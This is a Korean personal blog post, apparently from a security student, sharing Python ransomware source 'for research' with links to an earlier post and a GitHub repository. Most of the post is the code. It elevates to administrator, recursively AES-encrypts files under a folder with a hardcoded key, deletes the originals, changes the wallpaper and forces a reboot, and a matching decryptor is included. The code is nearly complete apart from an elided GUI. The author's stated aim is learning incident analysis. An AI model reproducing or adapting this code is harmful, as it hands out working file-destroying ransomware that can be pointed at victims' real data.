Ransomware #1

https://securitypositive.tistory.com/entry/Ransomware
https://github.com/KKongten/Ransomware

해당 글에서 랜섬웨어 관련 내용을 업로드 했었다.

본격적으로 연구를 위해 이전에 사용했었던 코드를 아래에 업로드 해볼까 한다.

import glob, os, struct, sys
from Crypto.Cipher import AES
from PyQt5.QtWidgets import QApplication, QWidget, QPushButton, QVBoxLayout, QHBoxLayout, QLabel
from PyQt5.QtCore import Qt
from PyQt5.QtGui import QIcon

def root_require():
    ASADMIN = 'asadmin'
    try:
        if sys.argv[-1] != ASADMIN:
            script = os.path.abspath(sys.argv[0])
            params = ' '.join([script] + sys.argv[1:] + [ASADMIN])
            shell.ShellExecuteEx(lpVerb='runas', lpFile=sys.executable, lpParameters=params)
        return True
    except:
        return False
    
def encrypt_file(key, in_filename, out_filename=None, chunksize=128*1024):
    if not out_filename:
        out_filename = in_filename + '.ransomeware'

    iv = os.urandom(16)
    encryptor = AES.new(key ,AES.MODE_CBC, iv)
    filesize = os.path.getsize(in_filename)

    with open(in_filename, 'rb') as infile:
        with open(out_filename, 'wb') as outfile:
            outfile.write(struct.pack('<Q', filesize))
            outfile.write(iv)

            while True:
                chunk = infile.read(chunksize)
                if len(chunk) == 0:
                    break
                elif len(chunk) % 32 != 0:
                    chunk += b' ' * (32 - len(chunk) % 32)

                outfile.write(encryptor.encrypt(chunk))
    
def decrypt_file(key, in_filename, out_filename=None, chunksize=32*1024):
    if not out_filename:
        out_filename = os.path.splitext(in_filename)[0]

    with open(in_filename, 'rb') as infile:
        origsize = struct.unpack('<Q', infile.read(struct.calcsize('Q')))[0]
        iv = infile.read(16)
        decryptor = AES.new(key, AES.MODE_CBC, iv)

        with open(out_filename, 'wb') as outfile:
            while True:
                chunk = infile.read(chunksize)

                if len(chunk) == 0:
                    break

                outfile.write(decryptor.decrypt(chunk))
            outfile.truncate(origsize)

key = b'Ransomware JIFS.'
startPath = 'C:/Users/user/Desktop/Ransomware/example/**'

def Encrypt_button():
    for filename in glob.iglob(startPath, recursive=True):
        if(os.path.isfile(filename)):
            if (os.access(filename,os.R_OK)) and (os.access(filename,os.W_OK)) and (os.access(filename,os.X_OK)):
                print('Encrypting> ' + filename)
                encrypt_file(key, filename)
                os.remove(filename)
    os.system("C:/Users/user/Desktop/Ransomware/Wallpaper.bat")
    os.system("shutdown -r -t 0")

def Decrypt_button():
    
    for filename in glob.iglob(startPath, recursive=True):
       if(os.path.isfile(filename)):
            fname, ext = os.path.splitext(filename)

            if (ext == '.ransomeware'):
                print('Decrypting> ' + filename)
                decrypt_file(key, filename)
                os.remove(filename)
    os.system("C:/Users/user/Desktop/Ransomware/Wallpaper1.bat")
    os.system("shutdown -r -t 0")
                    
# GUI 관련 코드 
# ~~~~~~
#

if __name__ == '__main__':
    import win32com.shell.shell as shell
    
    if root_require():
        app = QApplication(sys.argv)
        ex = ExWindow()
        sys.exit(app.exec_())
    else:
        print ("error message")

이제 코드를 업데이트 하면서 변경할 것들을 계속해서 업로드 해볼까 한다.
그토록 하고싶어하는 "침해사고 분석" 은 기회가 없겠지만..

다음번에도 기회가 된다면..!
랜섬웨어 분석을 해보고 싶고, 실제로 도움이 되고 싶기 때문에 시간을 써볼것이다.